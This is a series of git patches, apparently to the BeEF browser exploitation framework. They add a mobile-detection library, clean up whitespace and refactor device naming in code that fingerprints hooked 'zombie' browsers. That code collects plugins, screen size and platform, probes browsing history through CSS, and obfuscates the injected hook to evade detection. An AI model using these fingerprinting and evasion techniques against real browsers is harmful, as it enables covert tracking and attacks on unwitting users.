+   if (uagent.search(deviceHtcFlyer) > -1)
+      return false;
+
+   //Otherwise, if it's Android and does NOT have 'mobile' in it, Google says it's a tablet.
+   if (uagent.search(mobile) > -1)
+      return false;
+   else
+      return true;
+}
+
+
+//**************************
+// Detects if the current device is an Android OS-based device and
+//   the browser is based on WebKit.
+function DetectAndroidWebKit()
+{
+   if (DetectAndroid() && DetectWebkit())
+      return true;
+   else
+      return false;
+}
+
+
+//**************************
+// Detects if the current device is a GoogleTV.
+function DetectGoogleTV()
+{
+   if (uagent.search(deviceGoogleTV) > -1)
+      return true;
+   else
+      return false;
+}
+
+
+//**************************
+// Detects if the current browser is based on WebKit.
+function DetectWebkit()
+{
+   if (uagent.search(engineWebKit) > -1)
+      return true;
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current browser is the Nokia S60 Open Source Browser.
+function DetectS60OssBrowser()
+{
+   if (DetectWebkit())
+   {
+     if ((uagent.search(deviceS60) > -1 ||
+          uagent.search(deviceSymbian) > -1))
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current device is any Symbian OS-based device,
+//   including older S60, Series 70, Series 80, Series 90, and UIQ,
+//   or other browsers running on these devices.
+function DetectSymbianOS()
+{
+   if (uagent.search(deviceSymbian) > -1 ||
+       uagent.search(deviceS60) > -1 ||
+       uagent.search(deviceS70) > -1 ||
+       uagent.search(deviceS80) > -1 ||
+       uagent.search(deviceS90) > -1)
+      return true;
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current browser is a
+// Windows Phone 7 device.
+function DetectWindowsPhone7()
+{
+   if (uagent.search(deviceWinPhone7) > -1)
+      return true;
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current browser is a Windows Mobile device.
+// Excludes Windows Phone 7 devices.
+// Focuses on Windows Mobile 6.xx and earlier.
+function DetectWindowsMobile()
+{
+   //Exclude new Windows Phone 7.
+   if (DetectWindowsPhone7())
+      return false;
+   //Most devices use 'Windows CE', but some report 'iemobile'
+   //  and some older ones report as 'PIE' for Pocket IE.
+   if (uagent.search(deviceWinMob) > -1 ||
+       uagent.search(deviceIeMob) > -1 ||
+       uagent.search(enginePie) > -1)
+      return true;
+   //Test for Windows Mobile PPC but not old Macintosh PowerPC.
+   if ((uagent.search(devicePpc) > -1) &&
+       !(uagent.search(deviceMacPpc) > -1))
+      return true;
+   //Test for Windwos Mobile-based HTC devices.
+   if (uagent.search(manuHtc) > -1 &&
+       uagent.search(deviceWindows) > -1)
+      return true;
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current browser is a BlackBerry of some sort.
+// Includes the PlayBook.
+function DetectBlackBerry()
+{
+   if (uagent.search(deviceBB) > -1)
+      return true;
+   if (uagent.search(vndRIM) > -1)
+      return true;
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current browser is on a BlackBerry tablet device.
+//    Example: PlayBook
+function DetectBlackBerryTablet()
+{
+   if (uagent.search(deviceBBPlaybook) > -1)
+      return true;
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current browser is a BlackBerry device AND uses a
+//    WebKit-based browser. These are signatures for the new BlackBerry OS 6.
+//    Examples: Torch. Includes the Playbook.
+function DetectBlackBerryWebKit()
+{
+   if (DetectBlackBerry() &&
+       uagent.search(engineWebKit) > -1)
+      return true;
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current browser is a BlackBerry Touch
+//    device, such as the Storm, Torch, and Bold Touch. Excludes the Playbook.
+function DetectBlackBerryTouch()
+{
+   if (DetectBlackBerry() &&
+        ((uagent.search(deviceBBStorm) > -1) ||
+        (uagent.search(deviceBBTorch) > -1) ||
+        (uagent.search(deviceBBBoldTouch) > -1) ||
+        (uagent.search(deviceBBCurveTouch) > -1) ))
+      return true;
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current browser is a BlackBerry OS 5 device AND
+//    has a more capable recent browser. Excludes the Playbook.
+//    Examples, Storm, Bold, Tour, Curve2
+//    Excludes the new BlackBerry OS 6 and 7 browser!!
+function DetectBlackBerryHigh()
+{
+   //Disambiguate for BlackBerry OS 6 or 7 (WebKit) browser
+   if (DetectBlackBerryWebKit())
+      return false;
+   if (DetectBlackBerry())
+   {
+     if (DetectBlackBerryTouch() ||
+        uagent.search(deviceBBBold) > -1 ||
+        uagent.search(deviceBBTour) > -1 ||
+        uagent.search(deviceBBCurve) > -1)
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current browser is a BlackBerry device AND
+//    has an older, less capable browser.
+//    Examples: Pearl, 8800, Curve1.
+function DetectBlackBerryLow()
+{
+   if (DetectBlackBerry())
+   {
+     //Assume that if it's not in the High tier or has WebKit, then it's Low.
+     if (DetectBlackBerryHigh() || DetectBlackBerryWebKit())
+        return false;
+     else
+        return true;
+   }
+   else
+      return false;
+}
+
+
+//**************************
+// Detects if the current browser is on a PalmOS device.
+function DetectPalmOS()
+{
+   //Most devices nowadays report as 'Palm',
+   //  but some older ones reported as Blazer or Xiino.
+   if (uagent.search(devicePalm) > -1 ||
+       uagent.search(engineBlazer) > -1 ||
+       uagent.search(engineXiino) > -1)
+   {
+     //Make sure it's not WebOS first
+     if (DetectPalmWebOS())
+        return false;
+     else
+        return true;
+   }
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current browser is on a Palm device
+//   running the new WebOS.
+function DetectPalmWebOS()
+{
+   if (uagent.search(deviceWebOS) > -1)
+      return true;
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current browser is on an HP tablet running WebOS.
+function DetectWebOSTablet()
+{
+   if (uagent.search(deviceWebOShp) > -1 &&
+       uagent.search(deviceTablet) > -1)
+      return true;
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current browser is a
+//   Garmin Nuvifone.
+function DetectGarminNuvifone()
+{
+   if (uagent.search(deviceNuvifone) > -1)
+      return true;
+   else
+      return false;
+}
+
+
+//**************************
+// Check to see whether the device is a 'smartphone'.
+//   You might wish to send smartphones to a more capable web page
+//   than a dumbed down WAP page.
+function DetectSmartphone()
+{
+   if (DetectIphoneOrIpod()
+      || DetectAndroidPhone()
+      || DetectS60OssBrowser()
+      || DetectSymbianOS()
+      || DetectWindowsMobile()
+      || DetectWindowsPhone7()
+      || DetectBlackBerry()
+      || DetectPalmWebOS()
+      || DetectPalmOS()
+      || DetectGarminNuvifone())
+      return true;
+
+   //Otherwise, return false.
+   return false;
+};
+
+//**************************
+// Detects if the current device is an Archos media player/Internet tablet.
+function DetectArchos()
+{
+   if (uagent.search(deviceArchos) > -1)
+      return true;
+   else
+      return false;
+}
+
+//**************************
+// Detects whether the device is a Brew-powered device.
+function DetectBrewDevice()
+{
+   if (uagent.search(deviceBrew) > -1)
+      return true;
+   else
+      return false;
+}
+
+//**************************
+// Detects the Danger Hiptop device.
+function DetectDangerHiptop()
+{
+   if (uagent.search(deviceDanger) > -1 ||
+       uagent.search(deviceHiptop) > -1)
+      return true;
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current device is on one of
+// the Maemo-based Nokia Internet Tablets.
+function DetectMaemoTablet()
+{
+   if (uagent.search(maemo) > -1)
+      return true;
+   //For Nokia N810, must be Linux + Tablet, or else it could be something else.
+   if ((uagent.search(linux) > -1)
+       && (uagent.search(deviceTablet) > -1)
+       && !DetectWebOSTablet()
+       && !DetectAndroid())
+      return true;
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current browser is a Sony Mylo device.
+function DetectSonyMylo()
+{
+   if (uagent.search(manuSony) > -1)
+   {
+     if (uagent.search(qtembedded) > -1 ||
+         uagent.search(mylocom2) > -1)
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current browser is Opera Mobile or Mini.
+function DetectOperaMobile()
+{
+   if (uagent.search(engineOpera) > -1)
+   {
+     if (uagent.search(mini) > -1 ||
+         uagent.search(mobi) > -1)
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current browser is Opera Mobile
+// running on an Android phone.
+function DetectOperaAndroidPhone()
+{
+   if ((uagent.search(engineOpera) > -1) &&
+      (uagent.search(deviceAndroid) > -1) &&
+      (uagent.search(mobi) > -1))
+      return true;
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current browser is Opera Mobile
+// running on an Android tablet.
+function DetectOperaAndroidTablet()
+{
+   if ((uagent.search(engineOpera) > -1) &&
+      (uagent.search(deviceAndroid) > -1) &&
+      (uagent.search(deviceTablet) > -1))
+      return true;
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current device is a Sony Playstation.
+function DetectSonyPlaystation()
+{
+   if (uagent.search(devicePlaystation) > -1)
+      return true;
+   else
+      return false;
+};
+
+//**************************
+// Detects if the current device is a Nintendo game device.
+function DetectNintendo()
+{
+   if (uagent.search(deviceNintendo) > -1   ||
+	uagent.search(deviceWii) > -1 ||
+	uagent.search(deviceNintendoDs) > -1)
+      return true;
+   else
+      return false;
+};
+
+//**************************
+// Detects if the current device is a Microsoft Xbox.
+function DetectXbox()
+{
+   if (uagent.search(deviceXbox) > -1)
+      return true;
+   else
+      return false;
+};
+
+//**************************
+// Detects if the current device is an Internet-capable game console.
+function DetectGameConsole()
+{
+   if (DetectSonyPlaystation())
+      return true;
+   if (DetectNintendo())
+      return true;
+   if (DetectXbox())
+      return true;
+   else
+      return false;
+};
+
+//**************************
+// Detects if the current device is an Amazon Kindle (eInk devices only).
+// Note: For the Kindle Fire, use the normal Android methods.
+function DetectKindle()
+{
+   if (uagent.search(deviceKindle) > -1 &&
+       !DetectAndroid())
+      return true;
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current Amazon device is using the Silk Browser.
+// Note: Typically used by the the Kindle Fire.
+function DetectAmazonSilk()
+{
+   if (uagent.search(engineSilk) > -1)
+      return true;
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current device is a mobile device.
+//  This method catches most of the popular modern devices.
+//  Excludes Apple iPads and other modern tablets.
+function DetectMobileQuick()
+{
+   //Let's exclude tablets.
+   if (DetectTierTablet())
+      return false;
+
+   //Most mobile browsing is done on smartphones
+   if (DetectSmartphone())
+      return true;
+
+   if (uagent.search(deviceMidp) > -1 ||
+	DetectBrewDevice())
+      return true;
+
+   if (DetectOperaMobile())
+      return true;
+
+   if (uagent.search(engineNetfront) > -1)
+      return true;
+   if (uagent.search(engineUpBrowser) > -1)
+      return true;
+   if (uagent.search(engineOpenWeb) > -1)
+      return true;
+
+   if (DetectDangerHiptop())
+      return true;
+
+   if (DetectMaemoTablet())
+      return true;
+   if (DetectArchos())
+      return true;
+
+   if ((uagent.search(devicePda) > -1) &&
+        !(uagent.search(disUpdate) > -1))
+      return true;
+   if (uagent.search(mobile) > -1)
+      return true;
+
+   if (DetectKindle() ||
+       DetectAmazonSilk())
+      return true;
+
+   return false;
+};
+
+
+//**************************
+// Detects in a more comprehensive way if the current device is a mobile device.
+function DetectMobileLong()
+{
+   if (DetectMobileQuick())
+      return true;
+   if (DetectGameConsole())
+      return true;
+   if (DetectSonyMylo())
+      return true;
+
+   //Detect for certain very old devices with stupid useragent strings.
+   if (uagent.search(manuSamsung1) > -1 ||
+	uagent.search(manuSonyEricsson) > -1 ||
+	uagent.search(manuericsson) > -1)
+      return true;
+
+   if (uagent.search(svcDocomo) > -1)
+      return true;
+   if (uagent.search(svcKddi) > -1)
+      return true;
+   if (uagent.search(svcVodafone) > -1)
+      return true;
+
+
+   return false;
+};
+
+
+//*****************************
+// For Mobile Web Site Design
+//*****************************
+
+//**************************
+// The quick way to detect for a tier of devices.
+//   This method detects for the new generation of
+//   HTML 5 capable, larger screen tablets.
+//   Includes iPad, Android (e.g., Xoom), BB Playbook, WebOS, etc.
+function DetectTierTablet()
+{
+   if (DetectIpad()
+        || DetectAndroidTablet()
+        || DetectBlackBerryTablet()
+        || DetectWebOSTablet())
+      return true;
+   else
+      return false;
+};
+
+//**************************
+// The quick way to detect for a tier of devices.
+//   This method detects for devices which can
+//   display iPhone-optimized web content.
+//   Includes iPhone, iPod Touch, Android, Windows Phone 7, WebOS, etc.
+function DetectTierIphone()
+{
+   if (DetectIphoneOrIpod())
+      return true;
+   if (DetectAndroidPhone())
+      return true;
+   if (DetectBlackBerryWebKit() && DetectBlackBerryTouch())
+      return true;
+   if (DetectWindowsPhone7())
+      return true;
+   if (DetectPalmWebOS())
+      return true;
+   if (DetectGarminNuvifone())
+      return true;
+   else
+      return false;
+};
+
+//**************************
+// The quick way to detect for a tier of devices.
+//   This method detects for devices which are likely to be
+//   capable of viewing CSS content optimized for the iPhone,
+//   but may not necessarily support JavaScript.
+//   Excludes all iPhone Tier devices.
+function DetectTierRichCss()
+{
+    if (DetectMobileQuick())
+    {
+       //Exclude iPhone Tier and e-Ink Kindle devices
+       if (DetectTierIphone() || DetectKindle())
+          return false;
+
+       //The following devices are explicitly ok.
+       if (DetectWebkit())
+          return true;
+       if (DetectS60OssBrowser())
+          return true;
+
+       //Note: 'High' BlackBerry devices ONLY
+       if (DetectBlackBerryHigh())
+          return true;
+
+       //Older Windows 'Mobile' isn't good enough for iPhone Tier.
+       if (DetectWindowsMobile())
+          return true;
+
+       if (uagent.search(engineTelecaQ) > -1)
+          return true;
+
+       else
+          return false;
+    }
+    else
+      return false;
+};
+
+//**************************
+// The quick way to detect for a tier of devices.
+//   This method detects for all other types of phones,
+//   but excludes the iPhone and RichCSS Tier devices.
+// NOTE: This method probably won't work due to poor
+//  support for JavaScript among other devices.
+function DetectTierOtherPhones()
+{
+    if (DetectMobileLong())
+    {
+       //Exclude devices in the other 2 categories
+       if (DetectTierIphone() || DetectTierRichCss())
+          return false;
+
+       //Otherwise, it's a YES
+       else
+          return true;
+    }
+    else
+      return false;
+};
+
+
+//**************************
+// Initialize Key Stored Values.
+function InitDeviceScan()
+{
+    //We'll use these 4 variables to speed other processing. They're super common.
+    isIphone = DetectIphoneOrIpod();
+    isAndroidPhone = DetectAndroidPhone();
+    isTierIphone = DetectTierIphone();
+    isTierTablet = DetectTierTablet();
+
+    //Optional: Comment these out if you don't need them.
+    isTierRichCss = DetectTierRichCss();
+    isTierGenericMobile = DetectTierOtherPhones();
+};
+
+//Now, run the initialization method.
+InitDeviceScan()
diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb
index e0338d660..f120f7814 100644
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -21,7 +21,7 @@ module BeEF
             beef_js_path = "#{$root_dir}/core/main/client/"
 
             # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
-            ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js)
+            ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js)
 
             # @note BeEF libraries: need Eruby evaluation and obfuscation
             beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js)
@@ -102,7 +102,7 @@ module BeEF
 
             if config.get("beef.extension.evasion.enable")
               evasion = BeEF::Extension::Evasion::Evasion.instance
-              @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook) 
+              @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook)
             else
               @final_hook = ext_js_to_not_obfuscate + @hook
             end
diff --git a/extensions/evasion/config.yaml b/extensions/evasion/config.yaml
index 95536e9f4..06a1b803d 100644
--- a/extensions/evasion/config.yaml
+++ b/extensions/evasion/config.yaml
@@ -9,7 +9,7 @@ beef:
             enable: true
             name: 'Evasion'
             authors: ["antisnatchor"]
-            exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js"]
+            exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js","lib/mdetect.js"]
             scramble_variables: true
             scramble_cookies: true
             scramble:

From da7a7b96033ae87ed07902e29966b7d29ab6f148 Mon Sep 17 00:00:00 2001
From: Nbblrr <nbblrr@gmail.com>
Date: Sat, 5 Jan 2013 20:43:28 +0100
Subject: [PATCH 142/397] Improved Hardware detection with mdetect 2. #722

---
 core/main/client/browser.js     |  92 ++++++------
 core/main/client/hardware.js    |  33 +---
 core/main/client/lib/mdetect.js | 257 +-------------------------------
 3 files changed, 52 insertions(+), 330 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index f39fec33d..696601bd4 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -10,31 +10,31 @@
  * Basic browser functions.
  */
 beef.browser = {
-	
+
 	/**
 	 * Returns the user agent that the browser is claiming to be.
 	 * @example: beef.browser.getBrowserReportedName()
 	 */
-	getBrowserReportedName: function() {						
+	getBrowserReportedName: function() {
 		return navigator.userAgent;
 	},
-	
+
 	/**
 	 * Returns true if IE6.
 	 * @example: beef.browser.isIE6()
 	 */
-	isIE6: function() {						
+	isIE6: function() {
 		return !window.XMLHttpRequest && !window.globalStorage;
 	},
-	
+
 	/**
 	 * Returns true if IE7.
 	 * @example: beef.browser.isIE7()
 	 */
-	isIE7: function() {						
+	isIE7: function() {
 		return !!window.XMLHttpRequest && !window.chrome && !window.opera && !window.getComputedStyle && !window.globalStorage && !document.documentMode;
 	},
-	
+
 	/**
 	 * Returns true if IE8.
 	 * @example: beef.browser.isIE8()
@@ -42,7 +42,7 @@ beef.browser = {
 	isIE8: function() {
 		return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !window.performance;
 	},
-	
+
 	/**
 	 * Returns true if IE9.
 	 * @example: beef.browser.isIE9()
@@ -50,7 +50,7 @@ beef.browser = {
 	isIE9: function() {
 		return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance;
 	},
-	
+
 	/**
 	 *
 	 * Returns true if IE10.
@@ -68,7 +68,7 @@ beef.browser = {
 	isIE: function() {
 		return this.isIE6() || this.isIE7() || this.isIE8() || this.isIE9() || this.isIE10();
 	},
-	
+
 	/**
 	 * Returns true if FF2.
 	 * @example: beef.browser.isFF2()
@@ -76,7 +76,7 @@ beef.browser = {
 	isFF2: function() {
 		return !!window.globalStorage && !window.postMessage;
 	},
-	
+
 	/**
 	 * Returns true if FF3.
 	 * @example: beef.browser.isFF3()
@@ -84,7 +84,7 @@ beef.browser = {
 	isFF3: function() {
 		return !!window.globalStorage && !!window.postMessage && !JSON.parse;
 	},
-	
+
 	/**
 	 * Returns true if FF3.5.
 	 * @example: beef.browser.isFF3_5()
@@ -92,7 +92,7 @@ beef.browser = {
 	isFF3_5: function() {
 		return !!window.globalStorage && !!JSON.parse && !window.FileReader;
 	},
-	
+
 	/**
 	 * Returns true if FF3.6.
 	 * @example: beef.browser.isFF3_6()
@@ -108,7 +108,7 @@ beef.browser = {
 	isFF4: function() {
 		return !!window.globalStorage && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/4\./) != null;
 	},
-	
+
 	/**
 	 * Returns true if FF5.
 	 * @example: beef.browser.isFF5()
@@ -228,7 +228,7 @@ beef.browser = {
 	isS4: function() {
 		return (window.navigator.userAgent.match(/ Version\/4\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
 	},
-	
+
 	/**
 	 * Returns true if Safari 5.xx
 	 * @example: beef.browser.isS5()
@@ -244,7 +244,7 @@ beef.browser = {
 	isS6: function() {
 		return (window.navigator.userAgent.match(/ Version\/6\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
 	},
-	
+
 	/**
 	 * Returns true if Safari.
 	 * @example: beef.browser.isS()
@@ -260,7 +260,7 @@ beef.browser = {
 	isC5: function() {
 		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==5)?true:false);
 	},
-		
+
 	/**
 	 * Returns true if Chrome 6.
 	 * @example: beef.browser.isC6()
@@ -284,7 +284,7 @@ beef.browser = {
 	isC8: function() {
 		return (!!window.chrome && !!window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==8)?true:false);
 	},
-	
+
 	/**
 	 * Returns true if Chrome 9.
 	 * @example: beef.browser.isC9()
@@ -292,7 +292,7 @@ beef.browser = {
 	isC9: function() {
 		return (!!window.chrome && !!window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==9)?true:false);
 	},
-	
+
 	/**
 	 * Returns true if Chrome 10.
 	 * @example: beef.browser.isC10()
@@ -308,7 +308,7 @@ beef.browser = {
 	isC11: function() {
 		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==11)?true:false);
 	},
-	
+
 	/**
 	 * Returns true if Chrome 12.
 	 * @example: beef.browser.isC12()
@@ -460,7 +460,7 @@ beef.browser = {
 	isO: function() {
 		return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12();
 	},
-		
+
 	/**
 	 * Returns the type of browser being used.
 	 * @example: beef.browser.type().IE6
@@ -468,7 +468,7 @@ beef.browser = {
 	 * @example: beef.browser.type().O
 	 */
 	type: function() {
-		
+
 		return {
 			C5:	this.isC5(), 	// Chrome 5
 			C6:	this.isC6(), 	// Chrome 6
@@ -531,7 +531,7 @@ beef.browser = {
 			S:	this.isS()	// Safari any version
 		}
 	},
-	 
+
 	/**
 	 * Returns the type of browser being used.
 	 * @return: {String} User agent software and version.
@@ -539,7 +539,7 @@ beef.browser = {
 	 * @example: beef.browser.getBrowserVersion()
 	 */
 	getBrowserVersion: function() {
-				
+
 		if (this.isC5())	{ return '5'  }; 	// Chrome 5
 		if (this.isC6())	{ return '6'  }; 	// Chrome 6
 		if (this.isC7())	{ return '7'  }; 	// Chrome 7
@@ -597,7 +597,7 @@ beef.browser = {
 
 		return 'UNKNOWN';				// Unknown UA
 	},
-	
+
 	/**
 	 * Returns the type of user agent by hooked browser.
 	 * @return: {String} User agent software.
@@ -605,7 +605,7 @@ beef.browser = {
 	 * @example: beef.browser.getBrowserName()
 	 */
 	getBrowserName: function() {
-				
+
 		if (this.isC())		{ return 'C' }; 	// Chrome any version
 		if (this.isFF())	{ return 'FF'};		// Firefox any version
 		if (this.isIE())	{ return 'IE'};		// Internet Explorer any version
@@ -613,7 +613,7 @@ beef.browser = {
 		if (this.isS())		{ return 'S' };		// Safari any version
 		return 'UN';					// Unknown UA
 	},
-	
+
 	/**
 	 * Checks if the zombie has flash installed and enabled.
 	 * @return: {Boolean} true or false.
@@ -622,7 +622,7 @@ beef.browser = {
 	 */
 	hasFlash: function() {
 		if (!this.type().IE) {
-			return (navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"]); 
+			return (navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"]);
 		} else {
 			flash_versions = 11;
 			flash_installed = false;
@@ -683,7 +683,7 @@ beef.browser = {
 	 */
 	hasCors: function() {
 		if ('withCredentials' in new XMLHttpRequest())
-			return true;	
+			return true;
 		else if (typeof XDomainRequest !== "undefined")
 			return true;
 		else
@@ -726,7 +726,7 @@ beef.browser = {
 			return false;
 		}
 	},
-	
+
 	/**
 	 * Checks if the zombie has VBScript enabled.
 	 * @return: {Boolean} true or false.
@@ -740,7 +740,7 @@ beef.browser = {
 			return false;
 		}
 	},
-	
+
 	/**
 	 * Returns the list of plugins installed in the browser.
 	 */
@@ -778,20 +778,20 @@ beef.browser = {
 		// Return results
 		return results;
 	},
-	
+
 	/**
 	 * Returns a list of plugins detected by IE. This is a hack because IE doesn't
-	 * support navigator.plugins 
+	 * support navigator.plugins
 	 */
      getPluginsIE: function() {
         var results = '';
         var plugins = {'AdobePDF6':{
-            'control':'PDF.PdfCtrl', 
+            'control':'PDF.PdfCtrl',
             'return': function(control) {
                 version = control.getVersions().split(',');
                 version = version[0].split('=');
                 return 'Acrobat Reader v'+parseFloat(version[1]);
-            }}, 
+            }},
             'AdobePDF7':{
             'control':'AcroPDF.PDF',
             'return': function(control) {
@@ -851,10 +851,10 @@ beef.browser = {
 
 	/**
 	 * Returns zombie screen size and color depth.
-	 */	
+	 */
 	getScreenSize: function() {
 		return {
-			width: window.screen.width, 
+			width: window.screen.width,
 			height: window.screen.height,
 			colordepth: window.screen.colorDepth
 			}
@@ -863,7 +863,7 @@ beef.browser = {
 	/**
 	 * Returns zombie browser window size.
 	 * @from: http://www.howtocreate.co.uk/tutorials/javascript/browserwindow
-	 */	
+	 */
 	getWindowSize: function() {
 		  var myWidth = 0, myHeight = 0;
 		  if( typeof( window.innerWidth ) == 'number' ) {
@@ -884,13 +884,13 @@ beef.browser = {
 			  height: myHeight
 		  }
 	},
-	
+
 	/**
 	 * Construct hash from browser details. This function is used to grab the browser details during the hooking process
-	 */	
+	 */
 	getDetails: function() {
 		var details = new Array();
-		
+
 		var browser_name = beef.browser.getBrowserName();
 		var browser_version = beef.browser.getBrowserVersion();
 		var browser_reported_name = beef.browser.getBrowserReportedName();
@@ -903,7 +903,7 @@ beef.browser = {
 		var browser_plugins = beef.browser.getPlugins();
 		var date_stamp = new Date().toString();
 		var os_name = beef.os.getName();
-		var hw_name = beef.hardware.getName();
+		var hw_name = beef.hardware.getMobileName();
 		var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
 		var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;});
 		var screen_size = beef.browser.getScreenSize();
@@ -947,7 +947,7 @@ beef.browser = {
 
 		return details;
 	},
-	
+
 	/**
 	 * Returns array of results, whether or not the target zombie has visited the specified URL
 	 */
@@ -970,7 +970,7 @@ beef.browser = {
 				a.href = u;
 				ifdoc.body.appendChild(a);
 				var width = null;
-				(a.currentStyle) ? width = a.currentStyle['width'] : width = ifdoc.defaultView.getComputedStyle(a, null).getPropertyValue("width"); 
+				(a.currentStyle) ? width = a.currentStyle['width'] : width = ifdoc.defaultView.getComputedStyle(a, null).getPropertyValue("width");
 				if (width == '0px') {
 					success = true;
 				}
@@ -979,7 +979,7 @@ beef.browser = {
 			}
 		}
 		beef.dom.removeElement(iframe);
-		if (results.length == 0) 
+		if (results.length == 0)
 		{
 			return false;
 		}
@@ -1136,7 +1136,7 @@ beef.browser = {
 		return deferredObject.promise();
 
 	}
-	
+
 };
 
 beef.regCmp('beef.browser');
diff --git a/core/main/client/hardware.js b/core/main/client/hardware.js
index 01f69dc50..32732e5ec 100644
--- a/core/main/client/hardware.js
+++ b/core/main/client/hardware.js
@@ -8,38 +8,14 @@ beef.hardware = {
 
 	ua: navigator.userAgent,
 
-	isWinPhone: function() {
-		return (this.ua.match('(Windows Phone)')) ? true : false;
-	},
-
-	isIphone: function() {
-		return (this.ua.indexOf('iPhone') != -1) ? true : false;
-	},
-
-	isIpad: function() {
-		return (this.ua.indexOf('iPad') != -1) ? true : false;
-	},
-
-	isIpod: function() {
-		return (this.ua.indexOf('iPod') != -1) ? true : false;
-	},
-
 	isNokia: function() {
 		return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
 	},
 
-	isBlackBerry: function() {
-		return (this.ua.match('BlackBerry')) ? true : false;
-	},
-
 	isZune: function() {
 		return (this.ua.match('ZuneWP7')) ? true : false;
 	},
 
-	isKindle: function() {
-		return (this.ua.match('Kindle')) ? true : false;
-	},
-
 	isHtc: function() {
 		return (this.ua.match('HTC')) ? true : false;
 	},
@@ -66,15 +42,15 @@ beef.hardware = {
             return DetectMobileQuick();
         },
 
-	getName: function() {
-                var ua = navigator.userAgent;
+	getMobileName: function() {
+                var ua = navigator.userAgent.toLowerCase();
                 if(DetectIphone())              { return "iPhone"};
                 if(DetectIpod())                { return "iPod Touch"};
                 if(DetectIpad())                { return "iPad"};
 		if (this.isHtc())               { return 'HTC'};
 		if (this.isMotorola())          { return 'Motorola'};
 		if (this.isZune())              { return 'Zune'};
-		if (this.isGoogle())            { return 'Google'};
+		if (this.isGoogle())            { return 'Google Nexus One'};
 		if (this.isEricsson())          { return 'Ericsson'};
                 if(DetectAndroidPhone())        { return "Android Phone"};
                 if(DetectAndroidTablet())       { return "Android Tablet"};
@@ -82,7 +58,8 @@ beef.hardware = {
                 if(ua.search(deviceS60) > -1)   { return "Nokia S60"};
                 if(ua.search(deviceS70) > -1)   { return "Nokia S70"};
                 if(ua.search(deviceS80) > -1)   { return "Nokia S80"};
-                if(ua.search(deviceS90) > -1)   { return "Nokia Symbian"};
+                if(ua.search(deviceS90) > -1)   { return "Nokia S90"};
+                if(ua.search(deviceSymbian) > -1)   { return "Nokia Symbian"};
 		if (this.isNokia())             { return 'Nokia'};
                 if(DetectWindowsPhone7())       { return "Windows Phone 7"};
                 if(DetectWindowsMobile())       { return "Windows Mobile"};
diff --git a/core/main/client/lib/mdetect.js b/core/main/client/lib/mdetect.js
index 85de2b29e..8fa1ad199 100644
--- a/core/main/client/lib/mdetect.js
+++ b/core/main/client/lib/mdetect.js
@@ -1,39 +1,7 @@
 
 /* *******************************************
 // Copyright 2010-2012, Anthony Hand
-//
-// File version date: April 23, 2012
-//		Update:
-//		- Updated DetectAmazonSilk(): Fixed an issue in the detection logic.
-//
-// File version date: April 22, 2012 - Second update
